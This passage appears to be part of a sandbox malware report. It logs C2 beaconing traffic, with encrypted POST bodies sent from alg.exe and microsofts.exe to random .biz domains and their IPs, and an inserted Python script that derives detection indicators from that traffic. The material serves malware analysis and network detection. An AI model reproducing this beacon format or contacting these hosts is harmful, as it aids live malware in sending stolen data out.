Nov 5, 2024 17:03:15.653646946 CET | 828 | OUT | Data Raw: 76 be 29 51 14 c7 a7 53 30 03 00 00 8c b0 0d 1a 6a 61 1a 4b 9b 93 85 db f3 97 32 3e ad a6 58 38 c4 0e a9 4a b4 bd 69 d4 a2 8c 17 79 8d fa b8 03 56 2f 19 11 cd ea 09 a9 68 59 f2 53 91 f6 ba b7 f9 df 6c 77 b4 6f 5f b3 7e 78 16 b6 12 9f 7b c5 85 f7
    Data Ascii: v)QS0jaK2>X8JiyV/hYSlwo_~x{&44Z`2Dtu`Bry|_.qW<F}O<B_l{'.cAq@nv`vq?u)n>|}~t3Zx;)14^0HC[1F.
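Added example, not part of the Joe Sandbox report: a Python triage script that re-checks, from the request heads and the first 12 body bytes transcribed from sessions 17 to 21 above, the properties a responder would key a detection on: every request is a POST to a short all-lowercase path on a .biz host, sends no Accept or Content-Type header, carries the same Chrome 39 / WeChat User-Agent, and has a body of one of only two sizes. It also tests one inference that is the example's own and not documented protocol behaviour: in each body the little-endian uint32 at offset 8 equals Content-Length minus 12, so the body looks like an 8-byte variable prefix, a 4-byte payload length, then the payload. The helper names and the 12-byte header constant are this example's assumptions.

```python
import re
import struct

# Transcribed from the report's sessions 17-21: the User-Agent every request
# sent, the request line and headers, and the first 12 bytes of each POST body.
UA = ("Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) "
      "Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI "
      "WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400")


def _req(path, host, length):
    """Rebuild the request head exactly as captured (same header set and order)."""
    return (f"POST {path} HTTP/1.1\r\nCache-Control: no-cache\r\nConnection: Keep-Alive\r\n"
            f"Pragma: no-cache\r\nHost: {host}\r\nUser-Agent: {UA}\r\n"
            f"Content-Length: {length}\r\n\r\n")


# (session id, sending process, request head, first 12 bytes of the body)
SESSIONS = [
    (17, "alg.exe",        _req("/tookpqdumsvuivi", "lpuegx.biz", 778),   bytes.fromhex("8e2744e2158398eefe020000")),
    (18, "microsofts.exe", _req("/tqkivcurvenplovb", "lpuegx.biz", 828),  bytes.fromhex("ef56d764fe1bf50530030000")),
    (19, "alg.exe",        _req("/dh", "vjaxhpbji.biz", 778),             bytes.fromhex("aba1cc1315f93e91fe020000")),
    (20, "alg.exe",        _req("/dltqf", "vjaxhpbji.biz", 778),          bytes.fromhex("9455d24f6d045c28fe020000")),
    (21, "microsofts.exe", _req("/augbqjw", "vjaxhpbji.biz", 828),        bytes.fromhex("76be295114c7a75330030000")),
]

HEADER_LEN = 12                      # assumption: 8 varying bytes + uint32 LE length
RANDOM_PATH = re.compile(r"^/[a-z]{2,16}$")   # short, lowercase-only, no extension


def parse_request(text):
    """Split a raw HTTP/1.1 request head into (method, path, lower-cased header dict)."""
    head = text.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def framed_payload_length(body_prefix):
    """Little-endian uint32 at offset 8 of the POST body."""
    return struct.unpack_from("<I", body_prefix, 8)[0]


def framing_consistent(content_length, body_prefix):
    """True when the embedded length equals Content-Length minus the assumed 12-byte header."""
    return framed_payload_length(body_prefix) == content_length - HEADER_LEN


def beacon_indicators(session):
    """Per-request indicators a proxy or IDS rule could test individually."""
    sid, process, text, body = session
    method, path, headers = parse_request(text)
    clen = int(headers["content-length"])
    return {
        "session": sid,
        "process": process,
        "host": headers["host"],
        "random_path": method == "POST" and bool(RANDOM_PATH.match(path)),
        "no_content_type": "content-type" not in headers,
        "no_accept": "accept" not in headers,
        "ua_is_beacon_ua": headers.get("user-agent") == UA,
        "content_length": clen,
        "framing_ok": framing_consistent(clen, body),
    }


def summarize(sessions):
    """Aggregate across sessions: what is constant, and what varies with the sender."""
    rows = [beacon_indicators(s) for s in sessions]
    processes = sorted({r["process"] for r in rows})
    return {
        "requests": len(rows),
        "all_random_path": all(r["random_path"] for r in rows),
        "all_framing_ok": all(r["framing_ok"] for r in rows),
        "all_lack_content_type": all(r["no_content_type"] for r in rows),
        "all_same_ua": all(r["ua_is_beacon_ua"] for r in rows),
        "hosts": sorted({r["host"] for r in rows}),
        "body_size_by_process": {
            p: sorted({r["content_length"] for r in rows if r["process"] == p}) for p in processes
        },
    }


if __name__ == "__main__":
    for row in map(beacon_indicators, SESSIONS):
        print(row)
    print(summarize(SESSIONS))
```

Running it shows that the body size follows the sending process, not the C2 host: the three alg.exe requests all carry 778 bytes and the two microsofts.exe requests 828, across both lpuegx.biz and vjaxhpbji.biz, and in all five the length field at offset 8 reads 766 or 816, i.e. Content-Length minus 12. For a network rule, the fixed User-Agent plus the POST-without-Content-Type shape is the cheap match; the length-field relation is what distinguishes this framing from unrelated traffic that happens to spoof the same WeChat browser string.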


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.5 | 59491 | 47.129.31.212 | 80 | 1492 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:03:16.243174076 CET | 348 | OUT | POST /kqmqy HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: xlfhhhm.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 778
Nov 5, 2024 17:03:16.243174076 CET | 778 | OUT | Data Raw: 7e d5 9a 1f 80 40 4a 82 fe 02 00 00 45 b8 87 61 31 97 cd f1 0d 89 70 59 86 f9 a4 50 a6 7f ba 55 f6 9e 5a 53 5a 55 84 7f 7b 1d 0e 49 21 fd 1e f8 c3 42 0a 1c f5 ca fd 83 82 54 2e 0a 66 b6 e4 0e 78 2f 6d 30 23 1b df ed b1 51 32 93 dd 23 53 22 dc de
    Data Ascii: ~@JEa1pYPUZSZU{I!BT.fx/m0#Q2#S"YQ~;BZ=i*]:)6.|P%6_/80l1CZx[\ A&MN:=Lc::iCflo*uZ0y]2KTQ84;{r:Cz+L#
Nov 5, 2024 17:03:17.692315102 CET | 415 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 05 Nov 2024 16:03:17 GMT
    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=0f381188fc0538128daa34636122aad2|173.254.250.76|1730822597|1730822597|0|1|0; path=/; domain=.xlfhhhm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.5 | 59498 | 13.251.16.150 | 80 | 1492 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:03:17.886892080 CET | 343 | OUT | POST /b HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ifsaia.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 5, 2024 17:03:17.886946917 CET | 778 | OUT | Data Raw: b5 36 51 98 ae 97 8e 01 fe 02 00 00 6d 69 f7 68 3b cf ee 20 20 73 78 42 56 3b ea 6c 6c e9 30 6e 84 b1 7a 7e f9 8b 61 9a 7c 64 6c 08 4a 38 c8 38 3e 9a dc d6 e5 27 ee 1e 50 00 fb 2e 3c f2 5a 8d 67 2f ba 46 19 d0 97 ad 83 08 05 d3 c1 d6 12 78 6b 79
Data Ascii: 6Qmih; sxBV;ll0nz~a|dlJ88>'P.<Zg/FxkyD.(W^j@_-s+Ar.s^6;\.mnH2>|_oe?^VQ*Ko_&9cZ#Up<(G9/V=[Z1PX_A~cyN}=m3-5D1
Nov 5, 2024 17:03:19.334955931 CET | 414 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 05 Nov 2024 16:03:19 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=653760291abbfe43c00749b10901d6aa|173.254.250.76|1730822599|1730822599|0|1|0; path=/; domain=.ifsaia.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.5 | 59508 | 44.221.84.105 | 80 | 1492 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:03:19.708985090 CET | 354 | OUT | POST /rkqsyeybt HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: saytjshyf.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 5, 2024 17:03:19.709032059 CET | 778 | OUT | Data Raw: 52 f5 07 91 a0 a0 88 c9 fe 02 00 00 cc 51 87 83 44 c8 9b 1f d4 48 4c ee 89 db 7b 5c b6 c0 1f 04 02 a6 4c 87 a7 11 f9 24 15 97 c7 6e 80 ae 2d 76 11 f5 e2 20 1f 2b 04 65 1b 7e 81 b1 ad 18 8e bf 01 71 24 92 40 27 ab e9 1f e4 e2 ea a5 45 68 db 88 53
Data Ascii: RQDHL{\L$n-v +e~q$@'EhSwQa7_fQuu0m,i+S'b%y>s^S<3@grEF#+OR-K>vL@4/$&fG'G,>7_Ur


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.5 | 59509 | 44.221.84.105 | 80 | 1492 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:03:20.078854084 CET | 352 | OUT | POST /wpydads HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: saytjshyf.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 5, 2024 17:03:20.078890085 CET | 778 | OUT | Data Raw: 66 18 9d 6e 4d 66 ea 23 fe 02 00 00 40 58 f7 0b dd 3e 58 87 8c 5c 03 f2 5b fd 5f 68 87 41 f9 96 e2 44 0a 0e 5a e8 0d e0 42 b5 1b 23 a4 71 c2 66 f9 50 8c df 41 07 d5 6b aa d8 73 50 72 37 95 e0 f3 92 9a 83 7a e2 fc 8f bb 1c 21 6f 8b be 3c d5 b4 c1
Data Ascii: fnMf#@X>X\[_hADZB#qfPAksPr7z!o<twC,Co+TwK]L46KxOMe8qE^5$aLe%Od*3(/=aNB6sllp1s)%J[i
Nov 5, 2024 17:03:20.982525110 CET | 417 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 05 Nov 2024 16:03:20 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=a64d2167c3e0421ae975d145165ec3a4|173.254.250.76|1730822600|1730822600|0|1|0; path=/; domain=.saytjshyf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.5 | 59516 | 18.141.10.107 | 80 | 1492 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:03:21.197280884 CET | 353 | OUT | POST /aymirwrcjb HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: vcddkls.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 5, 2024 17:03:21.197313070 CET | 778 | OUT | Data Raw: 08 b9 db 4a 2b ed a6 ed fe 02 00 00 48 30 c2 0d ac 48 9c 9e 55 69 70 9d b9 72 23 06 5a 59 ec 45 41 3a 62 81 a9 b5 08 2e 42 8b 21 8d fa 16 ff 3e 2d 8b c9 ad b6 df 77 59 05 40 b5 8f 1f 78 8a 5b 53 d9 0f 27 bc ec 78 99 82 f1 f8 ce f8 28 d5 fe fd 20
Data Ascii: J+H0HUipr#ZYEA:b.B!>-wY@x[S'x( rq1}d ZHTMBiUwT}J|]~yb\ev3X?9* #$!3WSs5N+e,@Iv0vTA;wPu+AM
Nov 5, 2024 17:03:22.628385067 CET | 415 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 05 Nov 2024 16:03:22 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=178ae12b9d8ca06fce84d19897262dae|173.254.250.76|1730822602|1730822602|0|1|0; path=/; domain=.vcddkls.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.5 | 59527 | 172.234.222.138 | 80 | 1492 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:03:22.941175938 CET | 346 | OUT | POST /qntnr HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: fwiwk.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 5, 2024 17:03:22.941194057 CET | 778 | OUT | Data Raw: be 30 6f 62 2b d8 e6 eb fe 02 00 00 64 00 0c 2a f9 0a 2d 46 5c ce 26 00 59 86 90 6f d8 94 88 42 e7 8b d2 87 15 4a 67 b5 63 83 06 fc 40 d2 59 b6 77 96 c6 6d ec be 99 f3 eb 9a 96 40 01 5c a4 80 4c 9c ad 1d ee f0 f2 b5 2d a7 9b 18 7b a9 b3 e5 f4 89
Data Ascii: 0ob+d*-F\&YoBJgc@Ywm@\L-{%H[:qn^px>gHx5N%uE#]MRUw#TB5/CpJs!b7EY"^?vlLIATW_C=J|


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.5 | 59534 | 172.234.222.138 | 80 | 1492 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:03:24.415813923 CET | 354 | OUT | POST /vfgrjxuhtsfio HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: fwiwk.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 5, 2024 17:03:24.415838957 CET | 778 | OUT | Data Raw: 7c a9 15 a7 60 1a b1 4c fe 02 00 00 c9 eb 52 32 be 9a be 8d db 4b 6d 25 86 7f e4 54 9c 8f 11 1c 5e f3 57 a4 36 0e 0f a9 4a 36 07 e1 ac 7a cb dd a8 71 aa 2e 36 77 6e 09 95 ce 9c a7 78 74 79 99 8c 3f 12 51 0e a6 1d 49 2c b2 90 42 5b 48 9b fe 22 93
Data Ascii: |`LR2Km%T^W6J6zq.6wnxty?QI,B[H"A\dvvS%%3l,N_X8>R$5Ju~@4Gzhx5nPH7B64PkU#j=2O[#Qkf


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.5 | 59535 | 82.112.184.197 | 80 | 1816 | C:\Users\user\AppData\Local\Temp\microsofts.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:03:24.441998959 CET | 351 | OUT | POST /agsuui HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: vjaxhpbji.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828
Nov 5, 2024 17:03:24.442027092 CET | 828 | OUT | Data Raw: 45 8f b4 ad 35 2e c4 f5 30 03 00 00 ce 4e eb 78 64 0b 68 f8 41 d6 9d 1a 7e 7c 05 a8 06 29 db f2 38 40 af 5f 80 0b a9 39 72 53 b1 6a b5 c0 3b 2e 24 af 0b a9 6a 41 4d 6a 4f 97 ad 8e 87 2c ad 0a 0b 5e f2 27 c7 63 bd 85 db 92 02 64 16 68 d2 d7 e6 36
Data Ascii: E5.0NxdhA~|)8@_9rSj;.$jAMjO,^'cdh6r]xrS7z{O5\xi*Sb!d%&K5jI5>@{|VL0~%QEDO0(*)EuHP,CF8)yGWrq[vT5A"`kyN


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.5 | 59538 | 34.246.200.160 | 80 | 1492 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:03:25.292009115 CET | 346 | OUT | POST /icvb HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: tbjrpv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 5, 2024 17:03:25.292026997 CET | 778 | OUT | Data Raw: 20 7a 58 ee cc c7 c6 e4 fe 02 00 00 27 1f 7c e3 95 8a 2f 7d 32 96 fa b3 00 66 c8 b7 f3 71 1a a9 98 56 4c fa b3 2f 1e 8c de cb f2 fc ed bd b4 e9 c1 91 df ed f3 9f 56 1a 56 04 d6 e5 72 e4 3f 6a 90 c7 63 25 a5 a3 b6 90 98 7d 24 3c e4 63 d0 f5 08 0b
Data Ascii: zX'|/}2fqVL/VVr?jc%}$<cimgb5`VYIHd_/BZSO."[LI85[hgn$o$PM1)|?U'Hz=oM@90hFt@pPu
Nov 5, 2024 17:03:26.266257048 CET | 414 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 05 Nov 2024 16:03:26 GMT
Content-Type: text/html
Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=3a23e20d6ffb7036875369f45e6c2b57|173.254.250.76|1730822606|1730822606|0|1|0; path=/; domain=.tbjrpv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.5 | 59550 | 18.208.156.248 | 80 | 1492 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:03:26.590785980 CET | 356 | OUT | POST /mjdasdrrrpdajiq HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: deoci.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 5, 2024 17:03:26.590785980 CET | 778 | OUT | Data Raw: a6 c0 b1 52 83 62 64 b2 fe 02 00 00 61 15 e4 4d bc b1 e4 57 5b 9a e8 b9 b0 95 3f 9b 3e b5 67 02 b0 7c 24 4a eb 8d bb c4 c6 65 7c 7f 45 91 e4 56 21 14 72 08 44 cc ee 06 82 45 f1 c0 27 f4 df 64 b8 aa 49 e5 13 43 a3 44 7e bb 3e 26 02 cd fe 0a b9 c9
Data Ascii: RbdaMW[?>g|$Je|EV!rDE'dICD~>&mP@KKaf*(P ;m:)sV!"ud(uMeR$fZrB ^B;/AC^&Mx$:"$W{{Tzfp)3RKj$
Nov 5, 2024 17:03:27.263700962 CET | 413 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 05 Nov 2024 16:03:27 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=addf63e9794fd0ee73bb7ad23e46cbda|173.254.250.76|1730822607|1730822607|0|1|0; path=/; domain=.deoci.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.5 | 59556 | 208.100.26.245 | 80 | 1492 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:03:27.930447102 CET | 349 | OUT | POST /cpggj HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gytujflc.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 5, 2024 17:03:27.930470943 CET | 778 | OUT | Data Raw: ce 5f dc c4 20 3f f9 75 fe 02 00 00 ab 34 6f 84 32 c9 4e a8 0b 11 34 f7 f5 57 7e 61 47 0c 04 30 aa 09 9e 34 84 ef c5 f0 60 00 99 34 5e 92 3f 5e e5 f5 cf aa 14 66 8a 25 84 49 92 ca 4b 36 ba 17 cd 96 8e c5 5e af 57 9d ab 6a af eb cb a0 73 cb 35 72
Data Ascii: _ ?u4o2N4W~aG04`4^?^f%IK6^Wjs5rwrk&g)pY5oHd\tr!*z0i.p]l}9UmFH6IS{Ecd>5[(b$7M*`^D6H.^tJ<*2d*YM?'oIM
Nov 5, 2024 17:03:28.568125963 CET | 744 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.14.0 (Ubuntu)
Date: Tue, 05 Nov 2024 16:03:28 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 5, 2024 17:03:28.608021021 CET | 360 | OUT | POST /ywcfdqaloklmslqo HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gytujflc.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 5, 2024 17:03:28.608048916 CET | 778 | OUT | Data Raw: 73 fc e2 9f 48 1d de cf fe 02 00 00 44 69 1d 23 2b 36 03 eb f0 14 76 9a 1c 5b df dc dc 10 c0 8e 5c 3a ca a1 e7 79 40 90 5a 10 c7 2d eb 3e 0a b5 2d 72 96 a9 02 56 56 0a ab f2 d4 a2 ad 72 18 18 0c c9 ed d5 14 56 74 5e 7b 4d 9d bd ef 9b f3 3c 87 7e
Data Ascii: sHDi#+6v[\:y@Z->-rVVrVt^{M<~wbMIE!i(LJzu\NV6J<CMn+Zia'W(mek75#}yIqPo3#X}p|SoAisvY\cS
Nov 5, 2024 17:03:28.753660917 CET | 744 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.14.0 (Ubuntu)
Date: Tue, 05 Nov 2024 16:03:28 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
